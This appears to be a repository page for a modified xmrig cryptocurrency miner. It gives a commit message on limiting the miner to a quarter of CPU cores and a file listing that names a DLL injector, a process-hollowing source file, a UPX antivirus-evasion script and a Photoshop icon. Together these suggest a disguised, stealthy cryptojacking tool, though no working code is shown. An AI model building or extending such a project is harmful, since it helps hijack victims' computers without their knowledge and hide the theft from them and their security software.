changes to original xmrig to build custom .dll and .so
- Use GetSystemInfo() to detect actual core count dynamically - Calculate 25% of cores: max(1, totalCores / 4) - Create affinity masks dynamically: (1ULL << coresToUse) - 1 - Handle systems with 64+ cores using (DWORD_PTR)-1 - Works on 4, 8, 16, 32+ core systems automatically |
||
|---|---|---|
| .github/ISSUE_TEMPLATE | ||
| bin/WinRing0 | ||
| cmake | ||
| cmake_overrides | ||
| res | ||
| scripts | ||
| src | ||
| .gitignore | ||
| Adobe_Photoshop_CC_icon.svg | ||
| ai_prompt | ||
| build_cmd | ||
| CMakeLists.txt | ||
| dll_injector.cpp | ||
| dll_injectorWORKING.cpp | ||
| encode.cpp | ||
| inject_and_hollow.cpp | ||
| LICENSE | ||
| package.json | ||
| rditest.cpp | ||
| resume.cfg | ||
| session-ses_4e7c.md | ||
| test | ||
| test_xmrig.cpp | ||
| TODO | ||
| upx_evasion.py | ||